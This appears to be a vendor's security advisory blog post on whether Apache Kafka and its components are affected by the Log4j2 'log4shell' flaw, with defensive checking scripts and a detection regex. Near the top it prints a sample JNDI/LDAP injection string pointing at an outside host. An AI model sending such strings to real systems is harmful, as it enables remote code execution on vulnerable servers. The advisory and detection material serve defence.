Is Apache Kafka vulnerable to the Log4j2 (log4shell) exploit?

Information about a current cyber threat

Last updated: December 20th

We will keep this blog article up to date and revise the information and our recommendations as we learn more and the threat situation changes.

Since this article went viral, a few words about us (if you haven’t heard of us yet)


We have developed an application that lets you develop Apache Kafka applications faster, makes management of the Apache Kafka ecosystem very easy, and enables you to monitor and analyze real-time data. KaDeck is available as a desktop application or web service (in your infra) for single users and teams.

A few hours ago, a zero-day vulnerability (CVE-2021-44228, also called log4shell) was discovered in the popular Java logging library log4j2. It allows remote code execution (RCE) when a specially crafted string is logged (similar to SQL injection):

${jndi:ldap://32.189[.]202.232:11134/Basic/Command/Base64/V2VsY29tZSB0byBYZW90ZWsgOi0pIEkgaG9wZSB5b3UgZW5qb3kgdGhlIGFydGljbGUuIEZvbGxvdyB1cyBvbiB0d2l0dGVyIEB4ZW90ZWtnbWJoIQ}

The vulnerability affects log4j versions >= 2.0-beta9 and < 2.15. The older log4j version 1 is not directly affected as of today. However, development of log4j version 1 ended 6 years ago (EOL notice), which is why Log4j2 is widely used.
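As a rough illustration, the version range above can be turned into a small check. This is a minimal sketch: the function name `is_affected` is hypothetical, and it encodes only the range stated in this article (>= 2.0-beta9 and < 2.15), not any later fixes or backported releases.

```python
import re

# Matches versions such as "2.14.1", "2.15" or "2.0-beta9".
VERSION_RE = re.compile(r"(\d+)\.(\d+)(?:\.(\d+))?(?:-(alpha|beta|rc)(\d+))?")

def is_affected(version: str) -> bool:
    """Return True if a log4j version lies in the range >= 2.0-beta9 and < 2.15."""
    match = VERSION_RE.fullmatch(version.strip())
    if match is None:
        raise ValueError(f"unrecognized version string: {version!r}")
    major, minor = int(match.group(1)), int(match.group(2))
    patch = int(match.group(3) or 0)
    pre_kind, pre_number = match.group(4), int(match.group(5) or 0)

    if major != 2:
        return False  # log4j version 1 is not covered by this range
    if (minor, patch) >= (15, 0):
        return False  # 2.15 and later
    if (minor, patch) == (0, 0) and pre_kind is not None:
        # 2.0 pre-releases: the range starts at beta9
        if pre_kind == "alpha":
            return False
        if pre_kind == "beta":
            return pre_number >= 9
    return True

for candidate in ("1.2.17", "2.0-beta8", "2.0-beta9", "2.14.1", "2.15.0"):
    print(candidate, is_affected(candidate))
```

A check like this only helps to triage an inventory of dependencies; it does not replace updating the library.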

Exploiting the vulnerability is very simple. The following requirements must be met:

  • Log4j version 2 must be used (>= 2.0-beta9 and < 2.15)
  • The attacker must have direct or indirect (when input data is forwarded to other systems and logged there) access to the target system.
  • The user input/request (user agents, domain paths, text input, …) must be logged.

Currently, millions of scans are taking place to exploit the vulnerability. A proof of concept (POC) on GitHub illustrates the exploit, so even an inexperienced attacker can carry out an attack.

Update: Version 2.17 has now been released. The releases after 2.15 close a further vulnerability (CVE-2021-45046) in Log4j2 that still existed despite the 2.15 update. In our opinion, exploitation of this vulnerability is very unlikely, because it only works in one scenario that should be rare in practice. In 2.15, the interpretation of lookup strings in log entries (which works much like SQL injection and can be exploited to execute code) was disabled only for the actual message part of the log entry. The vulnerability therefore still exists if two conditions are both met: the thread context is logged, which probably happens frequently, and external user input is written into the thread context, which should be rather rare.

Nevertheless, the clear recommendation here can only be an update to 2.17.

How it works

Using a certain string logged by Log4j2, a class can be loaded into the application from an external system under the control of the hacker and executed (remote code execution).

This behavior can be disabled via a parameter for the JVM or the application (see section “Temporary mitigation” below). Newer Java versions have this behavior disabled by default: according to this blog post (see translation), JDK versions greater than 6u211, 7u201, 8u191, and 11.0.1 are not affected by this LDAP attack (RCE). In these versions, com.sun.jndi.ldap.object.trustURLCodebase defaults to false, which prevents JNDI from loading remote code via an LDAP lookup.

However, the vulnerability can be exploited in other ways: by not loading the classes remotely, but instead serializing the malicious code in the message and using classes that are already in the classpath to load them. Thus, if there are classes in the classpath that process user input and pass it to the InitialContext.lookup() function, RCE can still be performed.

An attack using this method by targeting the class org.apache.naming.factory.BeanFactory, present on Apache Tomcat servers, is discussed in this blog post. This is also the reason why the mitigation via setting the JVM parameter -Dlog4j2.formatMsgNoLookups=true (which was very widespread advice) is not sufficient, and why we have retracted that advice in the section “Temporary mitigation” of this article.

Using a current version of Java is therefore not enough to be safe. An update to log4j2 version 2.17 is absolutely necessary.

Is the Apache Kafka ecosystem affected by log4j2 exploit CVE-2021-44228?

A lot of companies use our software KaDeck to manage their Apache Kafka ecosystem and develop data streaming applications. For this reason, we have scanned and reviewed the Apache Kafka ecosystem for the vulnerability to inform our customers if action is required.

The list of components that we have checked (open-source versions):

  • Apache Kafka
  • Kafka Connect
  • Schema Registry
  • Rest Proxy
  • KSQL

The version numbers do not matter because the log4j libraries change only slightly over the different versions of Apache Kafka and the listed components, but not in a way that is relevant for the exploit.

The Apache Kafka components use an older version of log4j, version 1 (via slf4j-log4j12.jar), and are therefore not vulnerable to the exploit, as you can read in this article on SLF4J.org.

However, depending on the configuration, log4j version 1 can also be affected. This is the case when the configuration parameters TopicBindingName and TopicConnectionFactoryBindingName are used (e.g., when using the log4j JMS appender) and these options are set to a value that JNDI can handle, as pointed out by Luke Chen in this mail. This is normally not the case.

So your Apache Kafka deployment can be at risk, but the risk is very low, because it depends on your configuration. Please check your configurations, especially if you are using the JMS appender.
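A configuration check of this kind can be sketched as follows. This is an illustration under assumptions: the function name `find_jms_appender_settings` and the sample configuration are hypothetical, and the parser only handles simple `key=value` lines of a log4j version 1 properties file. It flags lines that configure org.apache.log4j.net.JMSAppender or set one of the two binding options mentioned above, so that a human can review them.

```python
BINDING_OPTIONS = ("TopicBindingName", "TopicConnectionFactoryBindingName")

def find_jms_appender_settings(properties_text):
    """Return (line_number, line) pairs that deserve a manual review."""
    findings = []
    for number, raw in enumerate(properties_text.splitlines(), start=1):
        line = raw.strip()
        if not line or line.startswith(("#", "!")):
            continue  # skip blank lines and comments
        key, _, value = line.partition("=")
        key, value = key.strip(), value.strip()
        uses_jms_appender = value.endswith("JMSAppender")
        sets_binding_option = key.endswith(BINDING_OPTIONS)
        if uses_jms_appender or sets_binding_option:
            findings.append((number, line))
    return findings

# Hypothetical sample configuration, for illustration only.
sample = """\
# console logging only would be harmless
log4j.rootLogger=INFO, stdout
log4j.appender.stdout=org.apache.log4j.ConsoleAppender
log4j.appender.jms=org.apache.log4j.net.JMSAppender
log4j.appender.jms.TopicBindingName=ldap://example.invalid/topic
"""

for number, line in find_jms_appender_settings(sample):
    print(f"line {number}: {line}")
```

An empty result means none of these settings appear in that file; it says nothing about configuration supplied in other ways.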

This assessment is consistent with other sources.

Apache Kafka Streams applications can be affected

Applications that use Kafka Streams, however, may be affected by the Log4j2 exploit. Kafka Streams applications are by nature standalone Java applications, so it is up to the developers to decide which logging framework to use. If you are using Log4j2 in your Kafka Streams applications, you should therefore take the steps described in the sections below.
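If you are unsure whether an application archive bundles Log4j2 at all, one common approach is to look for the JndiLookup class inside the JAR. The following is a minimal sketch: the function name `jar_contains_jndi_lookup` is hypothetical, and it only inspects the top-level entries of the archive, so JARs nested inside a fat JAR are not examined.

```python
import zipfile

# Path of the lookup class inside log4j-core; relocated (shaded) copies
# keep this suffix, which is why the check uses endswith().
JNDI_LOOKUP_CLASS = "org/apache/logging/log4j/core/lookup/JndiLookup.class"

def jar_contains_jndi_lookup(jar_path):
    """Return True if the archive contains an entry for the JndiLookup class."""
    with zipfile.ZipFile(jar_path) as jar:
        return any(name.endswith(JNDI_LOOKUP_CLASS) for name in jar.namelist())
```

A call such as `jar_contains_jndi_lookup("my-streams-app.jar")` (the file name is a placeholder) tells you only that the class is present, not which log4j2 version it belongs to, so a positive result is a prompt to check the dependency version.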

Monitoring log4shell attacks with KaDeck

KaDeck is also used in the security sector. A log4shell attack can be monitored in real-time with KaDeck.

If you already feed log information into a topic in Apache Kafka, you can use KaDeck to create a view that shows you all attacks live (or from the past).

Most attacks arrive via the user agent string attribute, but other fields cannot be ruled out. If your data is structured, a simple attribute-level filter with a “contains” condition is sufficient.

The entire payload can also be checked via the search function.

This way you should be able to easily track down attacks that are making use of this exploit.
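For readers who want to see the idea behind such a filter outside of KaDeck, here is a minimal sketch. It is not KaDeck's implementation; the function names and the record layout are hypothetical. It covers both variants described above: a check on individual attributes of a structured record and a check on the raw payload. It matches only the plain `${jndi:` prefix, so obfuscated variants that build the prefix from nested lookups would not be caught.

```python
import re

# Plain "${jndi:" prefix, matched case-insensitively.
JNDI_PATTERN = re.compile(r"\$\{jndi:", re.IGNORECASE)

def find_suspicious_fields(record):
    """Return the names of string attributes that contain the JNDI prefix."""
    return [name for name, value in record.items()
            if isinstance(value, str) and JNDI_PATTERN.search(value)]

def is_suspicious_payload(raw_payload):
    """Check an unstructured payload (the whole message as one string)."""
    return JNDI_PATTERN.search(raw_payload) is not None

# Hypothetical access-log record, for illustration only.
record = {
    "path": "/index.html",
    "user_agent": "${jndi:ldap://example.invalid/a}",
    "status": 200,
}
print(find_suspicious_fields(record))
print(is_suspicious_payload('{"user_agent": "Mozilla/5.0"}'))
```

Checking every string attribute rather than only the user agent reflects the point above that other fields cannot be ruled out.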

Temporary mitigation

If your Java applications (e.g., with Kafka Streams) use log4j2, you should first and foremost update the library to the latest 2.17 version.

Update: these mitigations are no longer recommended. Please update your log4j2 library.

KaDeck Web security patch

We have already rolled out security patch 3.1.9.2 for KaDeck Web. However, since our KaDeck Web image does not use an affected JVM version and no user input is logged directly (which is a requirement for the attack), we have not found any way to exploit this vulnerability in KaDeck Web 3.1.9 so far. Furthermore, KaDeck Web is used only by internal employees, which means that external exploitation can be ruled out. We therefore classify the risk for our customers as LOW.

However, we strongly recommend updating KaDeck Web to the latest version.

Please continue to keep yourself informed regarding vulnerabilities in this environment. We will also keep you updated via our Twitter channel if there is any change in the threat situation. We will update this blog article accordingly.


Software architect and engineer with a passion for data streaming and distributed systems.